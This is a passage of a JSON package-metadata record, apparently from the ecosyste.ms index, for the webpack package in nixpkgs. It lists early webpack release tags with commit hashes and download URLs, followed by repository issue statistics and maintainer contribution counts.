s://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-23T01:47:50.369Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{},"purl":"pkg:nix/nodePackages_latest.webpack?channel=24.05\u0026repository_url=https://channels.nixos.org/nixos-24.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/nodePackages_latest.webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/nodePackages_latest.webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/nodePackages_latest.webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,